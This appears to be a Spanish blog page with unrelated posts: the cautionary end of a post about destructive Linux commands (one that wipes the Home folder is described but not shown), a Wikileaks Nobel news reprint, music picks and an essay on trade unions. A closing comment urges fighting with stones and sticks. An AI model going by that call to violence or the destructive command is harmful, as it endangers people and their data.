    Este comando va a mover todo el contenido de tu carpeta Home a un directorio que no existe, esto significa que ya nunca volverás a ver tus archivos.

Por ninguna razón vayas a ejecutar estos comando en Linux, esto es más bien con fines didácticos, no queremos que pases un mal día de muertos!!

fuente:

http://www2.linuxparatodos.net/web/comunidad/noticias-y-blogs/-/blogs/feliz-dia-de-muertos-con-7-comandos-que-jamas-debes-ejecutar-en-linux

Wikileaks, candidato al Premio Nobel de la Paz

Wikileaks, candidato al Premio Nobel de la Paz

El portal de filtraciones en internet Wikileaks ha sido nominado candidato al Premio Nobel de la Paz 2011, según ha informado la agencia de noticias noruega NTB.

La candidatura de Wikileaks fue presentada oficialmente ante el Comité Nobel en Oslo por el parlamentario noruego Snorre Valen. El diputado socialista argumentó que Wikileaks es "una de las contribuciones más importantes de este siglo a la libertad de expresión y la transparencia".

El parlamentarto mencionó como ejemplo más reciente la revelación por parte de Wikileaks del enriquecimiento personal del ex presidente tunecino Zine el Abidine Ben Ali. Esta información, aseguró Valen, contribuyó a hundir una dictadura que había durado casi 25 años.

"Con sus publicaciones, Wikileaks ha revelado la corrupción y las violaciones del derecho por parte de gobiernos y empresas, y, sobre todo, también la vigilancia ilegal, los crímenes de guerra y las torturas en varios países", explicó el parlamentario noruego.

Como todos los años, el plazo para nominar candidatos al Premio Nobel de la Paz expira el 1 de febrero. El Comité Nobel dará a conocer su decisión en octubre. El último ganador fue el encarcelado activista de los derechos humanos chino Liu Xiaobo.

El máximo galardón mundial está dotado con 10 millones de coronas suecas (1,1 millones de euros o 1,6 millones de dólares).

Wikileaks está 'liderada' por el polémico Julian Assange, quien recientemente ha amenazado con revelar 'una avalancha' de documentos secretos.

fuente:

http://www.elmundo.es/elmundo/2011/02/02/internacional/1296635036.html

Superunknown-Soundgarden

Superunknown-Soundgarden buenisimos para el tiempo en el que tocaban.

Queen - These Are The Days Of Our Lives (Lyrics)

Queen - These Are The Days Of Our Lives (Lyrics) .......sin palabras  solo orejas

Popa Chubby Back Door Man

Popa Chubby Back Door Man..realmente es otro bluesman.buenisimo

Pixies Hey

Pixies Hey..que buenos que son ...sobre todo el bataca y el cantante

Patti Smith - Sweet Jane

Patti Smith - Sweet Jane .....preciosa cancion cuando escuché por primera vez me quede embrujado por ella.

SINDICATOS RENDIDOS, ANTE QUÉ Y POR QUÉ ....porque va a ser

SINDICATOS RENDIDOS, ANTE QUÉ Y POR QUÉ ....porque va a ser

Al hilo de mí último escrito, (Sindicatos y pensiones, ¿ni un ápice de autocrítica?   http://www.iugordon.com/sindicatos-y-pensiones-%C2%BFni-un-apice-de-autocritica/) Ricardo se hacía un par de preguntas que ampliaban y mejoraban, por sí solas y en una sola una línea, el valor de todo el artículo. También Alberto y Marley hacen buenas consideraciones.

Voy a dar mi particular punto de vista e intentar responder a esas dos cuestiones que considero son de vital importancia para los trabajadores.

Una nota aclaratoria inicial.

Para entender mi opinión es necesario conocer qué pienso yo de quién es y cómo es el sindicato. El sindicato somos todos, sin exclusiones, desde el primero hasta el último de sus afiliados. Y en esa línea defiendo que el sindicato es el reflejo exacto del “cuarto de aseo”, es decir, es la imagen exacta de todos los trabajadores. Si nosotros, los trabajadores, fuésemos más reivindicativos, tendríamos otros dirigentes más reivindicativos, si lo fuésemos menos (¿se podría?) los dirigentes lo serían menos también.

 

Partiendo de ésta, mi personal visión de lo que es un sindicato, la respuesta a la primera pregunta que se hacía Ricardo es sencilla, ¿Ante qué se han rendido? Solo pueden rendirse ante el enemigo, llámese patrón, banco, mercado, sistema…, otra cosa es quién ha firmado el acta de capitulación. Por un lado lo han firmado nuestros representantes elegidos, (con todas las carencias democráticas internas que se quiera, pero al fin elegidos y tolerados), y por el otro los representantes de la otra parte, es decir el PSOE (pudo elegir en qué bando estar, y eligió) y la CEOE.

Más compleja, de más extensa reflexión, es el alcance de la segunda pregunta, ¿Por qué se han rendido? Aquí tenemos que partir de la presunción de integridad de nuestros representantes, otra cosa es que discrepemos de sus fundamentos, de su actitud e incluso de su aptitud. Son, ya lo he dicho, el reflejo de la “Clase trabajadora” y hoy esta Clase no está por el sacrificio, por la huelga, por la movilización. Las cúpulas dirigentes de los sindicatos son, hoy en día,  meros gestores de servicios, expertos comunicadores, tecnócratas impasibles, flemáticos leguleyos, oficinistas aburguesados…, son lo que les hemos pedido que sean y lo que les hemos permitido ser.

Entonces, ¿por qué se han rendido? Lo han hecho porque les ha dado miedo la confrontación, porque han tenido miedo a una posible derrota (como que los sindicatos nunca hubieran perdido una batalla, cuestión ésta, la capacidad de levantarse tras una derrota, que es, precisamente, en donde han asentado su prestigio). Se han rendido porque ellos, personalmente y como cúpula dirigente, no estaban dispuestos a dar el paso final: desenmascarar e identificar a quien nos agrede. Ponerle siglas, nombre y apellido. Insisten en no informar a los trabajadores de que a ese enemigo se le vence también, y sobre manera, en las urnas. Ahí está la clave. Las cúpulas sindicales se han esterilizado tanto, se han vuelto tan asépticas, que han olvidado cuál es la esencia de su modus vivendi.

Y uno ya no entiende nada, o lo entiende todo, cuando ve la ubicación actual de los dos últimos Secretarios Generales de CC.OO, (uno dormitando en el PSOE  de los recortes laborales y el otro dejándose querer por la UPyD). Para echarse a llorar.

Sucede que a nuestros dirigentes sindicales no se les va de la mente la derrota que sufrieron, en 1984, las Trade Unions ante “la Dama de Hierro” Margaret Thatcher. En el recuerdo pavoroso  de esa derrota está basada toda la estrategia sindical (mayoritaria). Y se equivocan, gravemente, al enarbolar continuamente la bandera del miedo, y nos equivocamos nosotros al dejar que nos asusten. Pero podemos hacer algo, podemos elegir representantes sindicales que, sin ser descerebrados aventureros, sean más contundentes, menos temerosos. Debemos, tenemos, que elegir sindicalistas vocacionales no profesionales.

Un apunte que liga los dos párrafos anteriores. A las Trade Unions no se las derrotó solo en las barricadas, su derrota, su acta de defunción estuvo en las urnas cuando el pueblo, en 1987, volvió a elegir a Margaret Thatcher como Primera Ministra. Por eso es erróneo pensar que fue Margaret Thatcher quien ejecutó a las Trade Unions, cuando, en realidad, fue el pueblo, también adocenado y estupidizado por “las teles”, quien firmó su finiquito.

Y aunque parezca que me estoy saliendo del tema en cuestión no lo hago, de aquellos polvos (Tatcher-Reaganianos) vienen estos lodos actuales. El concepto de sindicato y sindicalismo, su forma de actuar, de ser, de pensar, de plantear, de defender, de reivindicar, todo viene dado por la victoria que el liberalismo Tahcheriano impuso a los sindicatos en 1987. Victoria con votos obreros, os recuerdo.

De esos lodos han bebido nuestros dirigentes sindicales. Y ahí está la verdadera razón de por qué se han rendido.

Lo han hecho porque tienen miedo a la derrota, a su derrota, ”lo que ellos llaman eufemísticamente “salvar el sindicato”, y porque no quieren desenmascarar  y ubicar en el sitio que realmente le concierne, con siglas, nombre y apellido, al socioliberalismo.

En definitiva Ricardo. Se han rendido ante el Poderoso Caballero y lo han hecho porque, nuestros dirigentes actuales, de sindicalistas tienen lo que yo de obispo. Y de valientes, menos aún

Salud, república y + sindicalismo de Clase

que nos queda.....la lucha a ostias,piedras,palos...como esta pasando en casi todo el planeta.a la mierda los gobiernos....